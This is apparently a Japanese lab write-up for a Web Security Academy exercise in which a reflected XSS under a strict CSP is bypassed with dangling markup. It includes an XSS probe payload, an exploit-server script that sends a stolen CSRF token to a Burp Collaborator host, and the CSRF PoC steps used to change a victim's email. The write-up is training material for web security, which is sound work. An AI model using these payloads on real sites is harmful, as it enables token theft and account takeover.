Hello there, ('ω')ノ

 

ぶら下がりマークアップ攻撃で非常に厳格なCSPで保護された反射型XSSを。

このラボでは、外部Webサイトへの送信要求をブロックする厳密なCSPを使用して。

ラボを解決するにはクロスサイトスクリプティングでCSPをバイパスして。

BurpCollaboratorを使用してCSRFトークンを盗み出して。 

 

まずは、ログインして。

 

 

電子メールの変更機能をの脆弱性を確認して。

 

 

メールアドレスを変更して。

 

 

リクエストをリピータへ。

 

 

リクエストからもペイロードを試してレスポンス内容を確認して。

　email="><img%20src=%20onerror=alert(1)>

 

 

コラボレータでペイロードをコピーして。

 

 

エクスプロイトサーバで下記のスクリプトを挿入して。

 

<script>
if(window.name) {
new Image().src='//tpmk842hfb966giifammbomdr4xulj.burpcollaborator.net?'+encodeURIComponent(window.name);
} else {
location = 'https://ac101f1b1eeeaf7d802dc061007700d4.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://ac0d1f4a1e42af4a8047c04b01b500b9.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>

 

%22%3E%3Ca%20

⇩

"><a

 

%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27

⇩

">Click me</a><base target='

 

 

Storeして、Viewでページを確認してからDeliverして。

ユーザがこのサイトにアクセスしてリンクをクリックすると。

CSRFトークンを悪意のあるWebサイトに送信して。

 

https://ac101f1b1eeeaf7d802dc061007700d4.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://ac0d1f4a1e42af4a8047c04b01b500b9.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27

 

 

次にコラボレータのHTTPインタラクションをデコードして。

 

 

CSRFトークンを取得して。

　value="ay0MXxt7xVnVKlJJXrKIT4RSQFs0qibR"

 

再度、電子メールをの変更を。

 

 

リクエストをインターセプトしてCSEF PoCへ。

 

 

オプションで自動送信スクリプトをチェックして。

メールアドレスと被害者から盗んだCSRFトークンを変更して。

Regenerateして、HTMLをコピーして。

 

 

インターセプトをオフにして。

エクスプロイトサーバに挿入して、Storeして。

 

 

Viewでエクスプロイトを確認してからDeliverすると。

 

 

クリアできた。

 

 

Best regards, (^^ゞ